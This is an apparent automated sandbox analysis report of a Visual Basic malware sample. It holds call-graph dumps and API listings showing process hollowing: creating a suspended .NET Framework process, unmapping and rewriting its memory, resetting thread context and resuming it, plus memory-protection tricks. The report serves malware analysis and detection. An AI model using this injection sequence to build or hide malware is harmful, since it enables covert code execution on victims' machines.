3401->3403 3401->3405 3636 54dd50 __vbaChkstk 3401->3636 3403->3405 3406 54d507 __vbaHresultCheckObj 3403->3406 3407 54d521 3403->3407 3405->3256 3406->3407 3408 54d67f __vbaAryLock #644 __vbaAryUnlock 3407->3408 3410 54d53f __vbaRedim __vbaAryLock 3407->3410 3409 54d6ba 3408->3409 3412 54b3eb 11 API calls 3409->3412 3411 54d58c 3410->3411 3413 54d597 __vbaHresultCheckObj 3411->3413 3414 54d5b1 3411->3414 3415 54d6d0 __vbaObjSet 3412->3415 3416 54d5b8 __vbaAryUnlock 3413->3416 3414->3416 3417 54d6e6 __vbaRedim 3415->3417 3418 54d709 3415->3418 3419 54d5d1 3416->3419 3420 54d5f3 3416->3420 3417->3418 3418->3405 3423 54d744 __vbaAryLock 3418->3423 3421 54e01f 192 API calls 3419->3421 3420->3405 3422 54d624 __vbaAryLock #644 __vbaAryUnlock 3420->3422 3424 54dd50 185 API calls 3420->3424 3421->3420 3427 54d65f 3422->3427 3425 54db3c 3423->3425 3426 54d77b 3423->3426 3428 54d618 3424->3428 3431 54db62 __vbaHresultCheckObj 3425->3431 3432 54db7c 3425->3432 3433 54d7b5 3426->3433 3434 54d79b __vbaHresultCheckObj 3426->3434 3429 54b3eb 11 API calls 3427->3429 3428->3405 3428->3422 3430 54d675 __vbaObjSet 3429->3430 3430->3408 3431->3432 3436 54db93 __vbaRedim __vbaAryLock 3432->3436 3437 54dc2d __vbaAryUnlock 3432->3437 3435 54d7bc 8 API calls 3433->3435 3434->3435 3438 54d84a 3435->3438 3441 54dbf8 3436->3441 3437->3405 3439 54d855 __vbaHresultCheckObj 3438->3439 3440 54d86f 3438->3440 3439->3440 3445 54d896 __vbaHresultCheckObj 3440->3445 3446 54d8b0 3440->3446 3442 54dc03 __vbaHresultCheckObj 3441->3442 3443 54dc1d 3441->3443 3444 54dc24 __vbaAryUnlock 3442->3444 3443->3444 3444->3437 3447 54d8b7 7 API calls 3445->3447 3446->3447 3448 54d932 3447->3448 3449 54d957 3448->3449 3450 54d93d __vbaHresultCheckObj 3448->3450 3451 54d97e __vbaHresultCheckObj 3449->3451 3452 54d998 3449->3452 3450->3449 3453 54d99f 7 API calls 3451->3453 3452->3453 3454 54da1a 3453->3454 3455 54da25 __vbaHresultCheckObj 3454->3455 3456 54da3f 3454->3456 3455->3456 3457 54da86 3456->3457 3458 54da6c __vbaHresultCheckObj 3456->3458 3459 54db37 3457->3459 3460 54da9d __vbaRedim __vbaAryLock 3457->3460 3458->3457 3459->3437 3461 54db02 3460->3461 3462 54db27 3461->3462 3463 54db0d __vbaHresultCheckObj 3461->3463 3464 54db2e __vbaAryUnlock 3462->3464 3463->3464 3464->3459 3466 40a995 3465->3466 3469 54c231 155 API calls 3466->3469 3467 40a9a3 3468 54c231 155 API calls 3467->3468 3468->3467 3469->3467 3471 5c788d __vbaFreeVar 3470->3471 3471->3258 3473 54ce82 3472->3473 3477 54ce87 3472->3477 3801 54ad80 GetPEB 3473->3801 3475 54cec3 3480 54cee2 3475->3480 3804 54acfa GetPEB 3475->3804 3476 54cea4 3476->3475 3803 54ad6c GetPEB 3476->3803 3477->3476 3802 54ad80 GetPEB 3477->3802 3480->3259 3480->3270 3483 40aa15 3482->3483 3485 54e5cc 3484->3485 3486 54e5d5 __vbaVarDup #633 #635 __vbaFreeVarList 3485->3486 3487 54e580 __vbaVarLateMemCallLd __vbaVarMove __vbaNextEachVar 3485->3487 3488 54e661 __vbaAryUnlock __vbaFreeObj __vbaFreeVarList __vbaFreeVar __vbaFreeVar 3486->3488 3487->3485 3488->3269 3806 54c6b3 __vbaChkstk __vbaRedim 3489->3806 3810 40aa84 3499->3810 3812 40af3c 3507->3812 3515 54ebb9 3510->3515 3511 54ebd5 __vbaStrVarVal #644 #644 3511->3515 3512 54ec50 __vbaAryDestruct 3512->3297 3514 54ec13 __vbaSetSystemError __vbaFreeStr 3514->3515 3515->3511 3515->3512 3515->3514 3814 40ae80 3516->3814 3816 5c812e __vbaChkstk __vbaVarVargNofree __vbaStrVarVal #644 __vbaFreeStr 3520->3816 3523 5c812e 5 API calls 3524 54cf8a 3523->3524 3525 54cf9d __vbaSetSystemError 3524->3525 3526 54cfb1 #616 __vbaStrMove 3525->3526 3527 54cfc8 __vbaStrCopy 3525->3527 3528 54cfd5 __vbaStrCopy 3526->3528 3527->3528 3529 54d002 __vbaFreeStr __vbaFreeStr 3528->3529 3529->3320 3818 40aa50 3530->3818 3820 54cab5 __vbaChkstk 3544->3820 3546 54cbac #644 3821 54b16f 3546->3821 3548 54cbd3 VirtualAlloc __vbaRedim __vbaAryLock #644 __vbaAryUnlock 3822 54b16f 3548->3822 3550 54cc4a __vbaAryLock #644 __vbaAryUnlock 3551 54cc86 3550->3551 3823 54cacd 6 API calls 3551->3823 3559->3325 3560->3347 3562 54b532 __vbaAryLock #644 __vbaAryUnlock 3561->3562 3563 54b512 __vbaRedim 3561->3563 3565 54b428 3562->3565 3563->3562 3565->3354 3565->3355 3566->3357 3567->3359 3568->3361 3570 54ef2f 3569->3570 3571 54ef54 3570->3571 3572 54ef3a __vbaHresultCheckObj 3570->3572 3573 54ef5b __vbaVarCmpGt __vbaVarOr __vbaBoolVarNull __vbaFreeVar 3571->3573 3572->3573 3574 54efc1 __vbaRedim __vbaAryLock 3573->3574 3575 54efbc __vbaFreeObj 3573->3575 3577 54f012 3574->3577 3575->3369 3578 54f037 3577->3578 3579 54f01d __vbaHresultCheckObj 3577->3579 3580 54f03e __vbaAryUnlock 3578->3580 3579->3580 3648 54ee37 __vbaChkstk #717 __vbaVarMove 3580->3648 3584 54ed51 3583->3584 3585 54ed73 3584->3585 3586 54ed5c __vbaHresultCheckObj 3584->3586 3587 54ed88 #526 __vbaStrVarMove __vbaStrMove __vbaFreeVar #644 3585->3587 3588 54ed86 __vbaFreeObj 3585->3588 3586->3585 3590 54edd2 3587->3590 3588->3381 3590->3588 3591 54eddd __vbaHresultCheckObj 3590->3591 3591->3588 3593 54e074 3592->3593 3594 54e0a2 3593->3594 3595 54e08c __vbaNew2 3593->3595 3596 54e0e1 3594->3596 3597 54e0ca __vbaHresultCheckObj 3594->3597 3595->3594 3598 54e0e5 __vbaStrToAnsi 3596->3598 3597->3598 3650 40ac80 3598->3650 3600 54e101 __vbaSetSystemError __vbaFreeStrList 3601 54e136 3600->3601 3602 54e347 3600->3602 3603 54e152 3601->3603 3604 54e13c __vbaNew2 3601->3604 3605 40abd0 155 API calls 3602->3605 3609 54e191 3603->3609 3610 54e17a __vbaHresultCheckObj 3603->3610 3604->3603 3606 54e35c __vbaSetSystemError __vbaLenBstr __vbaStrToAnsi 3605->3606 3607 40adc0 155 API calls 3606->3607 3608 54e381 __vbaSetSystemError __vbaStrToUnicode __vbaFreeStr 3607->3608 3611 40aad0 155 API calls 3608->3611 3612 54e195 __vbaStrToAnsi 3609->3612 3610->3612 3613 54e3c2 __vbaSetSystemError __vbaAryLock 3611->3613 3614 40ac80 155 API calls 3612->3614 3615 40ab50 155 API calls 3613->3615 3616 54e1b1 __vbaSetSystemError __vbaFreeStrList 3614->3616 3617 54e3fb __vbaSetSystemError __vbaAryUnlock __vbaRedimPreserve 3615->3617 3616->3602 3618 54e1e6 3616->3618 3619 54e342 __vbaFreeObj __vbaFreeStr 3617->3619 3620 54e202 3618->3620 3621 54e1ec __vbaNew2 3618->3621 3619->3401 3623 54e241 3620->3623 3624 54e22a __vbaHresultCheckObj 3620->3624 3621->3620 3625 54e245 __vbaStrToAnsi 3623->3625 3624->3625 3626 40ac80 155 API calls 3625->3626 3627 54e261 __vbaSetSystemError __vbaFreeStrList 3626->3627 3627->3602 3628 54e296 3627->3628 3629 54e2b2 3628->3629 3630 54e29c __vbaNew2 3628->3630 3631 54e2f1 3629->3631 3632 54e2da __vbaHresultCheckObj 3629->3632 3630->3629 3633 54e2f5 __vbaStrToAnsi 3631->3633 3632->3633 3634 40ac80 155 API calls 3633->3634 3635 54e311 __vbaSetSystemError __vbaFreeStrList 3634->3635 3635->3602 3635->3619 3637 54dd90 3636->3637 3638 54de12 __vbaAryLock #644 __vbaAryUnlock #644 3636->3638 3799 54dcce __vbaChkstk __vbaRefVarAry __vbaUbound __vbaVarMove 3637->3799 3793 54b152 3638->3793 3641 54de5a __vbaRedim __vbaAryLock __vbaAryLock 3794 40ad40 3641->3794 3644 54dec6 __vbaSetSystemError __vbaAryUnlock __vbaAryUnlock __vbaVarMove __vbaVarTstEq 3644->3641 3645 54df2c 7 API calls 3644->3645 3646 54dfc1 3645->3646 3647 54dff6 __vbaFreeVar __vbaAryDestruct 3646->3647 3647->3403 3649 54eea2 __vbaVarMove 3648->3649 3649->3575 3651 40ac89 3650->3651 3652 40ac8b 3650->3652 3651->3651 3656 54c231 __vbaChkstk #644 3652->3656 3653 40ac97 3655 54c231 155 API calls 3653->3655 3655->3653 3679 54b152 3656->3679 3658 54c27a #644 3680 54b152 3658->3680 3660 54c2a2 #644 3681 54f786 11 API calls 3660->3681 3662 54c2b9 __vbaChkstk 3717 54c559 __vbaChkstk __vbaVarDup 3662->3717 3664 54c2e2 __vbaStrVarMove __vbaStrMove __vbaFreeVar __vbaChkstk 3665 54c559 11 API calls 3664->3665 3666 54c327 __vbaStrVarMove __vbaStrMove __vbaFreeVar 3665->3666 3667 54c36f 3666->3667 3668 54c359 __vbaNew2 3666->3668 3669 54c3d0 3667->3669 3670 54c3b9 __vbaHresultCheckObj 3667->3670 3668->3667 3671 54c3d4 __vbaFreeVar #644 #644 3669->3671 3670->3671 3724 54f0c9 14 API calls 3671->3724 3673 54c3ff #644 3674 54f786 56 API calls 3673->3674 3675 54c42a 3674->3675 3762 54c478 __vbaChkstk 3675->3762 3677 54c433 __vbaFreeVar 3678 54c44b __vbaFreeStr __vbaFreeObj __vbaFreeStr 3677->3678 3678->3653 3679->3658 3680->3660 3682 54f845 3681->3682 3683 54f874 __vbaAryLock #644 __vbaAryUnlock 3682->3683 3684 54f8b8 __vbaObjSetAddref #644 __vbaFreeObj #644 3682->3684 3683->3682 3770 54b152 3684->3770 3686 54f8ec __vbaAryLock #644 __vbaAryUnlock #644 3771 54b152 3686->3771 3688 54f938 __vbaRedim #644 3772 54b152 3688->3772 3690 54f985 #644 3773 54b152 3690->3773 3692 54f9ab __vbaAryLock __vbaStrCat __vbaStrMove __vbaI4Str VirtualProtect 3693 54fa13 __vbaHresultCheckObj 3692->3693 3694 54fa2f 3692->3694 3695 54fa33 7 API calls 3693->3695 3694->3695 3774 54b152 3695->3774 3697 54fa99 __vbaFreeStr __vbaFreeVar 3700 54fab6 3697->3700 3698 54fb1d #644 3775 54b16f 3698->3775 3699 54fad8 __vbaAryLock #644 __vbaAryUnlock 3699->3700 3700->3698 3700->3699 3702 54fb41 #644 3776 54b16f 3702->3776 3704 54fb65 #644 3777 54b16f 3704->3777 3706 54fb89 #644 3778 54b16f 3706->3778 3708 54fbad #644 3779 54b16f 3708->3779 3710 54fbd1 VirtualProtect 3711 54fc29 __vbaHresultCheckObj 3710->3711 3714 54fc48 3710->3714 3711->3714 3712 54fcc3 #644 3715 54fcda 3712->3715 3713 54fc7e __vbaAryLock #644 __vbaAryUnlock 3713->3714 3714->3712 3714->3713 3716 54fd0d __vbaAryDestruct __vbaAryDestruct 3715->3716 3716->3662 3718 54c592 #644 __vbaI4Var 3717->3718 3719 54c5ad 3718->3719 3720 54c632 __vbaVarAdd __vbaVarMove 3719->3720 3721 54c5ed __vbaFreeVar 3719->3721 3722 54c5ef #697 __vbaVarCat __vbaVarMove __vbaFreeVar 3719->3722 3720->3718 3721->3664 3722->3719 3727 54f195 3724->3727 3725 54f1c4 __vbaAryLock #644 __vbaAryUnlock 3725->3727 3726 54f208 __vbaObjSetAddref #644 __vbaFreeObj #644 3780 54b152 3726->3780 3727->3725 3727->3726 3729 54f237 __vbaAryLock #644 __vbaAryUnlock #644 3730 54f283 3729->3730 3781 54b7a6 __vbaRedim 3730->3781 3732 54f2a0 #644 3782 54b152 3732->3782 3734 54f2c1 #644 3783 54b152 3734->3783 3736 54f2e9 __vbaAryLock __vbaStrCat __vbaStrMove __vbaI4Str VirtualProtect 3737 54f35f 3736->3737 3738 54f348 __vbaHresultCheckObj 3736->3738 3739 54f363 7 API calls 3737->3739 3738->3739 3784 54b152 3739->3784 3741 54f3d1 __vbaFreeStr __vbaFreeVar 3745 54f3f0 3741->3745 3742 54f412 __vbaAryLock #644 __vbaAryUnlock 3742->3745 3743 54f45a #644 3785 54b152 3743->3785 3745->3742 3745->3743 3746 54f47c #644 3786 54b152 3746->3786 3748 54f49e #644 3787 54b152 3748->3787 3750 54f4c0 #644 3788 54b152 3750->3788 3752 54f4e2 #644 3789 54b152 3752->3789 3754 54f501 #644 #644 3755 54f55c 3754->3755 3756 54f567 __vbaHresultCheckObj 3755->3756 3759 54f57e 3755->3759 3756->3759 3757 54f5b3 __vbaAryLock #644 __vbaAryUnlock 3757->3759 3758 54f5fb #644 3760 54f612 3758->3760 3759->3757 3759->3758 3761 54f63b __vbaAryDestruct __vbaFreeObj 3760->3761 3761->3673 3790 54cab5 __vbaChkstk 3762->3790 3764 54c4af #644 #644 3791 54b152 3764->3791 3766 54c4dc #644 3792 54b16f 3766->3792 3768 54c502 #644 3769 54c52a 3768->3769 3769->3677 3770->3686 3771->3688 3772->3690 3773->3692 3774->3697 3775->3702 3776->3704 3777->3706 3778->3708 3779->3710 3780->3729 3781->3732 3782->3734 3783->3736 3784->3741 3785->3746 3786->3748 3787->3750 3788->3752 3789->3754 3790->3764 3791->3766 3792->3768 3793->3641 3795 40ad49 3794->3795 3797 54c231 155 API calls 3795->3797 3796 40ad57 3798 54c231 155 API calls 3796->3798 3797->3796 3798->3796 3800 54dd31 __vbaVarAdd __vbaVarSub __vbaI4Var __vbaFreeVarList 3799->3800 3800->3638 3801->3477 3802->3476 3803->3475 3805 54ad08 3804->3805 3805->3480 3807 54c70c __vbaFreeVar #644 3806->3807 3808 40ab10 3807->3808 3809 40ab19 3808->3809 3811 40aa8d 3810->3811 3813 40af45 3812->3813 3815 40ae89 3814->3815 3817 54cf71 3816->3817 3817->3523 3819 40aa59 3818->3819 3820->3546 3821->3548 3822->3550 3824 54cb55 __vbaAryLock #644 __vbaAryUnlock 3823->3824 3825 54b161 3824->3825 3826 54b169 __vbaI4Var 3825->3826 3827 5aff5f 3826->3827 3828 54b24f __vbaChkstk 3829 54b299 3828->3829 3837 5c732c __vbaChkstk 3829->3837 3833 54b2c3 3884 5c738d __vbaChkstk 3833->3884 3888 54aa9f 3837->3888 3840 54b868 11 API calls 3899 54f663 __vbaChkstk __vbaVarDup #653 __vbaI4Var __vbaFreeVar 3840->3899 3842 54b932 11 API calls 3843 54f663 10 API calls 3842->3843 3844 54b9d4 45 API calls 3843->3844 3847 54bc27 3844->3847 3845 54bc62 __vbaAryLock #644 __vbaAryUnlock 3845->3847 3846 54bcac __vbaObjSetAddref #644 __vbaFreeObj #644 3904 54b16f 3846->3904 3847->3845 3847->3846 3849 54bcf1 __vbaAryLock #644 __vbaAryUnlock #644 3905 54b152 3849->3905 3851 54bd4f __vbaRedim #644 3906 54b152 3851->3906 3853 54bd9f #644 3907 54b152 3853->3907 3855 54bdd3 __vbaAryLock __vbaStrCat __vbaStrMove __vbaI4Str VirtualProtect 3856 54be48 __vbaHresultCheckObj 3855->3856 3857 54be69 3855->3857 3858 54be70 __vbaAryUnlock __vbaFreeStr #644 3856->3858 3857->3858 3859 54bea8 3858->3859 3860 54bee5 __vbaAryLock #644 __vbaAryUnlock 3859->3860 3861 54bf33 #644 3859->3861 3860->3859 3908 54b152 3861->3908 3863 54bf61 #644 3909 54b152 3863->3909 3865 54bf8f #644 3910 54b152 3865->3910 3867 54bfbd #644 3911 54b152 3867->3911 3869 54bfeb #644 3912 54b152 3869->3912 3871 54c019 VirtualProtect 3872 54c07c __vbaHresultCheckObj 3871->3872 3875 54c09d 3871->3875 3872->3875 3873 54c0e1 __vbaAryLock #644 __vbaAryUnlock 3873->3875 3874 54c12f #644 3913 54b152 3874->3913 3875->3873 3875->3874 3877 54c151 #644 3914 54b152 3877->3914 3879 54c168 #644 3880 54c18b 3879->3880 3881 54c478 6 API calls 3880->3881 3882 54c194 __vbaFreeVar 3881->3882 3883 54c216 __vbaAryDestruct 3882->3883 3883->3833 3915 40ae40 3884->3915 3889 54aac1 3888->3889 3897 54b055 GetPEB 3889->3897 3891 54aacb 3892 54ab20 NtAllocateVirtualMemory 3891->3892 3893 54ab43 NtProtectVirtualMemory 3891->3893 3892->3893 3894 54ab3e __vbaFreeVar 3892->3894 3893->3894 3896 54ab6e 3893->3896 3894->3840 3895 54ac07 NtProtectVirtualMemory 3895->3894 3896->3895 3898 54b067 3897->3898 3898->3891 3900 54f6cd 3899->3900 3901 54f6de #632 __vbaVarCat __vbaVarMove __vbaFreeVarList 3900->3901 3902 54f72f __vbaFreeVar 3900->3902 3901->3900 3902->3842 3904->3849 3905->3851 3906->3853 3907->3855 3908->3863 3909->3865 3910->3867 3911->3869 3912->3871 3913->3877 3914->3879 3916 40ae49 3915->3916 3918 54c231 155 API calls 3916->3918 3917 40ae57 3919 54c231 155 API calls 3917->3919 3918->3917 3919->3917 3920 22a2da5 3921 22a2dae 3920->3921 3939 22a3376 GetPEB 3921->3939 3923 22a2de5 3924 22a326a 3923->3924 3925 22a3376 GetPEB 3923->3925 3926 22a2e00 3925->3926 3926->3924 3927 22a2f6c NtCreateSection 3926->3927 3927->3924 3928 22a2fa3 NtMapViewOfSection 3927->3928 3928->3924 3929 22a2fcb 3928->3929 3930 22a312e GetPEB 3929->3930 3933 22a3069 CreateProcessW 3929->3933 3930->3933 3932 22a3174 NtGetContextThread 3932->3933 3934 22a3195 NtReadVirtualMemory 3932->3934 3933->3924 3933->3932 3934->3933 3935 22a31bb NtWriteVirtualMemory 3934->3935 3935->3933 3936 22a31e1 NtUnmapViewOfSection NtMapViewOfSection 3935->3936 3936->3933 3937 22a3215 NtSetContextThread 3936->3937 3937->3933 3938 22a3246 NtResumeThread 3937->3938 3938->3924 3938->3933 3940 22a338b 3939->3940 3940->3923

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 564 22a2da5-22a2deb call 22a3273 call 22a3376 570 22a326a-22a3270 564->570 571 22a2df1-22a2e07 call 22a3376 564->571 571->570 574 22a2e0d-22a2efa call 22a32c7 * 12 571->574 574->570 599 22a2f00-22a2f03 574->599 599->570 600 22a2f09-22a2f0c 599->600 600->570 601 22a2f12-22a2f15 600->601 601->570 602 22a2f1b-22a2f1e 601->602 602->570 603 22a2f24-22a2f27 602->603 603->570 604 22a2f2d-22a2f30 603->604 604->570 605 22a2f36-22a2f39 604->605 605->570 606 22a2f3f-22a2f42 605->606 606->570 607 22a2f48-22a2f4b 606->607 607->570 608 22a2f51-22a2f53 607->608 608->570 609 22a2f59-22a2f67 608->609 610 22a2f69 609->610 611 22a2f6c-22a2f9d NtCreateSection 609->611 610->611 611->570 612 22a2fa3-22a2fc5 NtMapViewOfSection 611->612 612->570 613 22a2fcb-22a3001 call 22a3357 612->613 616 22a3039-22a3063 call 22a33b4 call 22a3357 613->616 617 22a3003-22a3009 613->617 628 22a3069-22a30e0 616->628 629 22a312e-22a313a GetPEB 616->629 619 22a300e-22a3012 617->619 621 22a302a-22a3037 619->621 622 22a3014-22a3027 call 22a3357 619->622 621->616 623 22a300b 621->623 622->621 623->619 633 22a30e2-22a30f2 628->633 630 22a313d-22a3144 629->630 632 22a3151-22a316e CreateProcessW 630->632 632->570 634 22a3174-22a318f NtGetContextThread 632->634 633->633 635 22a30f4-22a30f7 633->635 636 22a3256-22a3259 634->636 637 22a3195-22a31b5 NtReadVirtualMemory 634->637 638 22a3105-22a3109 635->638 640 22a325b-22a325c 636->640 641 22a3262-22a3265 636->641 637->636 639 22a31bb-22a31df NtWriteVirtualMemory 637->639 642 22a310b 638->642 643 22a30f9-22a3104 638->643 639->636 644 22a31e1-22a3213 NtUnmapViewOfSection NtMapViewOfSection 639->644 640->641 641->632 645 22a3118-22a311d 642->645 643->638 648 22a3253 644->648 649 22a3215-22a3244 NtSetContextThread 644->649 646 22a311f-22a312c 645->646 647 22a310d-22a3117 645->647 646->630 647->645 648->636 649->648 650 22a3246-22a3251 NtResumeThread 649->650 650->570 650->648
                                                                    APIs
                                                                    • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 022A2F91
                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 022A2FBE
                                                                    • CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 022A3169
                                                                    • NtGetContextThread.NTDLL(?,?), ref: 022A3188
                                                                    • NtReadVirtualMemory.NTDLL(?,?,?,000001D8,?), ref: 022A31AE
                                                                    • NtWriteVirtualMemory.NTDLL(?,?,?,00000004,?), ref: 022A31D8
                                                                    • NtUnmapViewOfSection.NTDLL(?,?), ref: 022A31F3
                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 022A320C
                                                                    • NtSetContextThread.NTDLL(?,00010003), ref: 022A323D
                                                                    • NtResumeThread.NTDLL(?,00000000), ref: 022A324A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1706328962.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_22a0000_VYLigyTDuW.jbxd
                                                                    Similarity
                                                                    • API ID: Section$ThreadView$ContextCreateMemoryVirtual$ProcessReadResumeUnmapWrite
                                                                    • String ID: D$\Microsoft.NET\Framework\$e$egas$m.ex
                                                                    • API String ID: 1951729442-1087957892
                                                                    • Opcode ID: bdfd8c2c08da80d8aef1ac999a3557cfaab083761e6134d184dbc6d082490619
                                                                    • Instruction ID: 1f07927fcd9acedf42666c483b64391fea9c6ec642e7b596e81d01e92bb132b7
                                                                    • Opcode Fuzzy Hash: bdfd8c2c08da80d8aef1ac999a3557cfaab083761e6134d184dbc6d082490619
                                                                    • Instruction Fuzzy Hash: 41E1F3B2D1429AAFDF11DFE4CC90AADBBB9EF08304F1480AAE515AA604D7749E41CF54

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 651 22a2d84-22a2d8c 652 22a2dae-22a2deb call 22a3273 call 22a3376 651->652 653 22a2d8e-22a2da8 651->653 659 22a326a-22a3270 652->659 660 22a2df1-22a2e07 call 22a3376 652->660 653->652 660->659 663 22a2e0d-22a2efa call 22a32c7 * 12 660->663 663->659 688 22a2f00-22a2f03 663->688 688->659 689 22a2f09-22a2f0c 688->689 689->659 690 22a2f12-22a2f15 689->690 690->659 691 22a2f1b-22a2f1e 690->691 691->659 692 22a2f24-22a2f27 691->692 692->659 693 22a2f2d-22a2f30 692->693 693->659 694 22a2f36-22a2f39 693->694 694->659 695 22a2f3f-22a2f42 694->695 695->659 696 22a2f48-22a2f4b 695->696 696->659 697 22a2f51-22a2f53 696->697 697->659 698 22a2f59-22a2f67 697->698 699 22a2f69 698->699 700 22a2f6c-22a2f9d NtCreateSection 698->700 699->700 700->659 701 22a2fa3-22a2fc5 NtMapViewOfSection 700->701 701->659 702 22a2fcb-22a3001 call 22a3357 701->702 705 22a3039-22a3063 call 22a33b4 call 22a3357 702->705 706 22a3003-22a3009 702->706 717 22a3069-22a30e0 705->717 718 22a312e-22a313a GetPEB 705->718 708 22a300e-22a3012 706->708 710 22a302a-22a3037 708->710 711 22a3014-22a3027 call 22a3357 708->711 710->705 712 22a300b 710->712 711->710 712->708 722 22a30e2-22a30f2 717->722 719 22a313d-22a3144 718->719 721 22a3151-22a316e CreateProcessW 719->721 721->659 723 22a3174-22a318f NtGetContextThread 721->723 722->722 724 22a30f4-22a30f7 722->724 725 22a3256-22a3259 723->725 726 22a3195-22a31b5 NtReadVirtualMemory 723->726 727 22a3105-22a3109 724->727 729 22a325b-22a325c 725->729 730 22a3262-22a3265 725->730 726->725 728 22a31bb-22a31df NtWriteVirtualMemory 726->728 731 22a310b 727->731 732 22a30f9-22a3104 727->732 728->725 733 22a31e1-22a3213 NtUnmapViewOfSection NtMapViewOfSection 728->733 729->730 730->721 734 22a3118-22a311d 731->734 732->727 737 22a3253 733->737 738 22a3215-22a3244 NtSetContextThread 733->738 735 22a311f-22a312c 734->735 736 22a310d-22a3117 734->736 735->719 736->734 737->725 738->737 739 22a3246-22a3251 NtResumeThread 738->739 739->659 739->737
                                                                    APIs
                                                                    • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 022A2F91
                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 022A2FBE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1706328962.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_22a0000_VYLigyTDuW.jbxd
                                                                    Similarity
                                                                    • API ID: Section$CreateView
                                                                    • String ID: D$\Microsoft.NET\Framework\$e$egas$m.ex
                                                                    • API String ID: 1585966358-1087957892
                                                                    • Opcode ID: 6327e63b1e9fef26b9da0fe59f744d1e2ca5589a6206d007fbefc548ff69a82f
                                                                    • Instruction ID: 89774a5bc8df415278a573dfb9bf125f885b984ca95de5ea2791d1be429ea90c
                                                                    • Opcode Fuzzy Hash: 6327e63b1e9fef26b9da0fe59f744d1e2ca5589a6206d007fbefc548ff69a82f
                                                                    • Instruction Fuzzy Hash: 68E1F5B2D1425AAFDF21DFE4CC91AADBBB9FF08304F1440AAE514AA604D7749E41CF54

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 781 54aa9f-54ab1e call 54ad92 call 54b055 call 54adb4 call 54aff6 call 54adb4 call 54aff6 call 54adb4 call 54aff6 798 54ab20-54ab3c NtAllocateVirtualMemory 781->798 799 54ab43-54ab67 NtProtectVirtualMemory 781->799 798->799 800 54ab3e 798->800 801 54ab6e-54ab73 799->801 802 54ab69 799->802 803 54ac66-54ac6b 800->803 804 54ab76-54ab79 801->804 802->803 805 54ac07-54ac60 NtProtectVirtualMemory 804->805 806 54ab7f-54ab98 call 54969a 804->806 805->803 809 54ab9f-54abaa 806->809 810 54ab9a-54ab9d 806->810 812 54ac02 809->812 810->809 811 54abac-54abaf 810->811 813 54abc7-54abca 811->813 814 54abb1-54abc5 811->814 812->804 815 54abcc-54abcf 813->815 816 54abe8-54abeb 813->816 814->812 815->816 817 54abd1-54abe6 815->817 816->812 818 54abed-54abf0 816->818 817->812 818->812 819 54abf2-54abf5 818->819 819->812 820 54abf7-54abff 819->820 820->812
                                                                    APIs
                                                                    • NtAllocateVirtualMemory.NTDLL(000000FF,00000100,00000000,00000100,00003000,00000040,?,NtQueryInformationProcess,00549803,?,NtQueryInformationProcess,0054981D,?,NtQueryInformationProcess,005497EC,NtQueryInformationProcess), ref: 0054AB36
                                                                    • NtProtectVirtualMemory.NTDLL(000000FF,?,00000005,00000040,?,?,NtQueryInformationProcess,00549803,?,NtQueryInformationProcess,0054981D,?,NtQueryInformationProcess,005497EC,NtQueryInformationProcess,0054988E), ref: 0054AB61
                                                                    • NtProtectVirtualMemory.NTDLL(000000FF,?,00000005,?,?,?,NtQueryInformationProcess,00549803,?,NtQueryInformationProcess,0054981D,?,NtQueryInformationProcess,005497EC,NtQueryInformationProcess,0054988E), ref: 0054AC5D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd
                                                                    Similarity
                                                                    • API ID: MemoryVirtual$Protect$Allocate
                                                                    • String ID: NtQueryInformationProcess
                                                                    • API String ID: 955180148-2781105232
                                                                    • Opcode ID: 65003259267a48dea0162c14ed572c17b15970b34e6d359670fe1a0235e867d8
                                                                    • Instruction ID: a3cbb4029fee8000afd623c5b8054db80d084ecb38c8d31c404502b2b63c41a0
                                                                    • Opcode Fuzzy Hash: 65003259267a48dea0162c14ed572c17b15970b34e6d359670fe1a0235e867d8
                                                                    • Instruction Fuzzy Hash: 2251C57194460AAFDB40DFA8CC89FEEFFB5FB94318F148209E111A7191D7B09A448B62

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
